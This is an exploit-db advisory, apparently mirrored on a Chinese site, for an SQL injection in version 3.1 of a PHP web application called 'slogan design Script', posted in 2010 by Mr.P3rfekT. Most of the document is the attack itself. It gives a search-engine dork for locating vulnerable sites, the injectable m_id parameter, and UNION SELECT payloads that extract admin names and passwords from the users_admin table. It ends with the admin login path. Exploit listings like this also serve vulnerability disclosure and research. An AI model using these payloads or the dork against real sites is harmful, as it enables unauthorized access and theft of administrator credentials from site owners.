slogan design Script – SQL Injection - 体验盒子

作者： Mr.P3rfekT

日期： 2010-06-03

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/12849/

Title: slogan design Script SQL Injection Vulnerability
# Version:
3.1
# Author: Mr.P3rfekT
# Software Site:
http://www.slogandesign.co.il
# Tested on Lunix
# CVE : N/A

###############
Founded By Mr.P3rfekT --- We Will Not Go Down ###############

#
Dork : " inurl:"index.php?m_id="

# Helllo Allz.


#
Exploit :

http://[site]/path/index.php?m_id={SQLi}



#
Poc Username:

union select
1,2,3,4,5,6,7,8,name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
from users_admin


# Poc Password:

union select
1,2,3,4,5,6,7,8,pass,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
from users_admin


# Demo:

http://[site]/union
select
1,2,3,4,5,6,7,8,name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
from users_admin

# Admin Login


#
http://[site]/admin/login.php

# ./done.


####################################################################